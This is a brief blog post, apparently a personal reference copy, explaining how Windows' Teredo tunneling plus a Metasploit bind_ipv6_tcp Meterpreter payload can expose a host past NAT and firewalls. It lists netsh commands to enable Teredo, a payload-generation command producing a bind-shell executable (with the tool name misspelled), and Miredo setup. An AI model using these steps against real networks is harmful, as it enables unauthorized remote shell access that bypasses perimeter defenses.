Subscribe by RSS RSS Icon
Follow me on Twitter Twitter Icon

Meterpreter and Teredo to Make Your Perimeter Useless

Teredo is a tunneling service built in to Windows. It’s intent was to allow anyone to have access to the IPv6 enabled internet, free, and dead simple, no infrastructure changes needed. Basically, an internal host is asking a Teredo server/relay for an IPv6 IP address. It does this over UDP and which by default in Windows points to over port 3544 (UDP).

When the tunnel is established, the host is given a 2001::/32 address. This address is a public IP. This essentially meant that your Windows shares and any other listening service was publicly available, despite your NAT and Firewall. Unfortunately, Microsofts has issued a patch for this that deny all traffic from NAT Traversals (Teredo). However, you can still connect to your server over NAT Traversals with the help of bind_ipv6_tcp payload in Metasploit.

The commands used in the video are below:

netsh interface ipv6 install

netsh interface ipv6 set teredo enterpriseclient

./mspfayload windows/meterpreter/bind_ipv6_tcp LPORT=9001 X > bind.exe

The only thing that was behind the scenes was giving the Metasploit host an IPv6 address. I used Miredo (Teredo for *nix/OSX):

#Install miredo
apt-get install miredo

#Remove it from starting automatically
update-rc.d miredo –f remove


Copyright Info.

Only for my personal reference. I do not own any of these materials here. Use it at your own risk!

XHTML/CSS validations
Valid XHTML 1.0 Transitional Valid CSS!